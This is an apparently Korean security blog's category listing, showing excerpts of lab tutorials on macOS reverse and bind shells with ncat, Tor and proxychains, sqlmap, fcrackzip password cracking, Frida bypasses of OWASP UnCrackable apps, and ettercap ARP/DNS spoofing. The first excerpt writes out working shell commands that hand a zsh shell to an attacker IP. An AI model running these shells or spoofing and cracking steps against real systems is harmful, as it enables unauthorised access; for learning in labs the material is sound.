본문 바로가기

728x90

🔒정보보안108

네트워크 해킹 - 맥(MacOS) 리버스 쉘(Reverse Shell), 바인드 쉘(Bind Shell) 연결 실습 환경 공격자 환경: Ubuntu IP: 192.168.0.5 공격 대상 MacOS(10.13.6) IP: 192.168.0.6 * 맥에서는 nc 명령어가 되지 않는 문제로 대신 ncat 명령어를 사용하였다. 리버스 쉘 공격자가 직접 서버를 여는 방식으로 공격 대상자의 막혀있는 방화벽(아웃바인드)을 우회할 수 있다. 공격자(Ubuntu) nc -lvp 4444 공격 대상(MacOS) ncat 192.168.0.5 4444 -e /bin/zsh 바인드 쉘 공격 대상자가 직접 서버를 여는 형태이다. 공격 대상(MacOS) ncat -lvp 4444 -e /bin/zsh 공격자(Ubuntu) nc 192.168.0.6 4444 출처: https://hobbylists.tistory.com/entry/kal.. 2022. 8. 5.

네트워크 해킹 - tor 작동 원리 다음은 Tor 클라이언트 A (원본)에서 Tor 서버 B, C를 차례로 거쳐 목적지 D (일반 Web 서버 등)에 이르는 경우의 설명이다. 1. A는 미리 얻고 있는 디렉토리 목록에서 임의로 B와 C를 선택한다. 2. A는 B에 대해 가상 회선 연결 요청, AB 사이의 암호화 통신을 위한 세션 키를 교환하기 위한 정보와 함께 전달한다. 3. B는 A에 가상 회선 연결 수락과 함께 세션 키 교환을 위한 정보를 전송한다. 4. AB 사이에 전단까지 얻은 세션 키는 암호화 통신로 얻을 수 있다. 이후 AB 간의 통신이 암호화 통신 경로를 사용하여 행해진다. 5. A는 B에 대해 "B가 C에 대한 가상 회선 연결의 요구를 제출하는 것"을 요구하는 전송한다. 6. B는 C에 대해 가상 회선 연결 요청, BC 사이.. 2022. 8. 1.

리눅스 - ssh 연결시 tor socks5 경유하기 필요 패키지 설치 apt install tor apt install connect # nc(netcat)이 설치되어 있다면 무시 설치 후에는 tor를 실행시켜준다. 사용 명령어 connect ProxyCommand 사용 방법 ssh -o "ProxyCommand connect -5 -S localhost:9050 %h %p" user@123.123.123.123 nc ProxyCommand 사용 방법 ssh -o ProxyCommand="nc -x localhost:9050 %h %p" user@123.123.123.123 프록시 성공 확인 명령어 Windows netstat -n | findstr 22 Linux/macOS who am i 위의 명령어 실행시에 내 접속 아이피가 tor IP 주소로 뜬다.. 2022. 8. 1.

웹 해킹 - sqlmap sqlmap은 파이썬으로 작성된 오픈 소스 SQL Injection 자동화 도구이다. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 등 다양한 DBMS들을 지원하고 boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band 공격 방식들을 지원한다고 한다. 이렇게나 다양한 옵션을 다 자동적으로 해주기 때문에 쓰지 않을 이유가 없다. 더 자세한 내용은 직접 공식 사이트에서 확인 가능 https://sqlmap.org/ sqlmap: automatic SQL injection and database takeover .. 2022. 7. 24.

시스템 해킹 - zip 암호화 해제(Fcrackzip) 설치 apt install fcrackzip 무차별대입 공격과 사전 공격으로 zip을 암호화 해주는 도구입니다. fcrackzip -b -c a1 -l 1-12 -u al.zip -b: 브루트포스 옵션 -c: 문자 타입(a는 문자 조합, 1은 숫자 조합) -l: 문자 크기 -u: zip 파일 경로 fcrackzip -D -p dic.txt al.zip -D: 사전 공격 옵션 -p: 사전 파일 경로 그밖의 다양한 옵션들은 -h나 --help로 확인하시면 됩니다. 참고: https://tggg23.tistory.com/35 [Two Greedy] Frackzip 으로 암호화 압축풀기 가상으로 구축된 환경 외에 시도하는 것은 엄연히 불법입니다. 모든 책임은 개개인에게 있으니 조심해주세요 안녕하세요 Retain.. 2022. 7. 24.

암호 - 스테가노그래피 만들기 스테가노그래피 Stegano(감춰진) + Graphy(글) = Steganography 즉, 내용을 숨겨버리는 기술 이를 이용해서 png, mp3, zip 등 다양한 파일을 숨길 수 있다. 암호화 방법(Windows): copy /b image.jpg+secret.zip result.jpg 암호화 방법(Linux) cat file1 file2 > output 복호화 방법: 암호화된 파일의 확장자를 기존의 숨겨둔 파일의 확장자로 변경 ex) result.jpg -> result.zip 출처: https://arca.live/b/encryption/32069015?p=2 스테가노그래피 만드는 방법 - 암호화 연구 채널 원리를 설명하는 글이 아니기 때문에 심화적인 내용은 다루지 않고 간단하게 하는 방법을 알아.. 2022. 7. 21.

프리다 - Uncrackable2 비밀번호 해제하기 UnCrackable-Level2를 jadx로 열어보니 요번에도 마찬가지로 어떤 메소드에 사용자가 입력한 텍스트를 건내주어 true, false를 반환하고 있다. 해당 함수를 쫒아가면 왠 bar라는 함수에다가 또 값을 건내서 리턴 값을 반환하고 있는데, 보다시피 bar 함수는 native로 선언이 되어있으며, 함수의 몸통은 보여지지가 않는다. 자바 native 키워드 참고: https://fors.tistory.com/80 자바의 native 키워드는 자바로 쓰여진 언어가 아닌 주로 C언어, C++ 같은 외부의 실행 가능한 라이브러리를 불러와서 사용할 수 있는 기능을 해준다. 이 외부의 라이브러리는 잘알려진 .so나 .dll 같은 외부 라이브러리 파일을 의미함 즉 bar 함수의 검증 기능을 확인하고 싶으.. 2022. 6. 24.

프리다 - Uncrackable1 비밀번호 해제하기 이번에는 루트 감지 우회를 이어서 비밀번호를 우회를 해보겠다. 이번에는 굳이 루팅이 필요없으니깐 녹스 설정에서 ROOT를 꺼주었다. 앱 분석 보는 것처럼 EditText에 아무 글자를 넣고 버튼을 누르면 맞는 정답이 아니라고 뜬다. 이번 목표는 이를 우회하여 성공이 뜨게하는 것 앱 디컴파일 하기 저 동작 과정에서 어떤 모듈이 오가는지 또 그 모듈안에는 어떤 수식들이 있는지 확인을 위해서 앱 디컴파일러인 jadx를 설치해준다. https://github.com/skylot/jadx/releases Releases · skylot/jadx Dex to Java decompiler. Contribute to skylot/jadx development by creating an account on GitHub... 2022. 6. 24.

프리다 - Uncrackable1 ROOTING 감지 우회하기 앱 설치 https://github.com/OWASP/owasp-mstg/tree/master/Crackmes/Android/Level_01 GitHub - OWASP/owasp-mstg: The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing an The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes the technical processes for verifying the controls li.. 2022. 6. 23.

프리다 - NOX 환경 설치 [윈도우 환경에서 frida 설치] pip install frida pip install frida-tools [frida-server 설치] https://github.com/frida/frida/releases Releases · frida/frida Clone this repo to build Frida. Contribute to frida/frida development by creating an account on GitHub. github.com 윈도우의 파이썬과 통신하기 위해서는 안드로이드에서 frida-server가 설치가 되어있어야 하는데 위의 깃허브로 들어가서 자신의 NOX 환경에 맞는 버전으로 frida-server를 설치해야 합니다. [현재 NOX CPU 환경 확인 명령어] nox_.. 2022. 6. 23.

네트워크 해킹 - ettercap의 arp 스푸핑을 이용해 dns 스푸핑하기 우선 ettercap 켠다. 그리고 eth0에 접근 인터페이스 상단에 보면 돋보기 모양이 있는데 이를 클릭해 주변에 존재하는 호스트들을 잡는다. 그리고 확인된 아이피 어드레스들 중 라우터(공유기)로 추정되는 것은 Target 1으로 지정하고, 스니핑(도청)을 당하고자하는 타겟은 Target 2로 지정 이제 다시 인터페이스에 상단 맨 오른쪽에 지구본 모양이 있는데 이를 클릭해서 ARP poising...을 누른 다음 이런 체크 박스 창이 뜨게되면 사진과 같이 "Sniff remote connections."를 체크하고 OK를 눌러 ARP 스푸핑을 시작한다. 이제 피해자의 PC를 조작한다. cmd에 들어가서 "arp -a"를 실행시켜주게 되면 (ARP 테이블 확인 명령어) 공유기의 물리적 주소가 아래의 다른.. 2021. 12. 22.

네트워크 해킹 - Tor ProxyChains 로컬 프록시 설정 https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [설치 및 설정] # tor 설치 sudo apt install tor # proxychains 설정 파일 수정하기 sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15.

이전 1 ··· 5 6 7 8 9 다음

728x90

티스토리툴바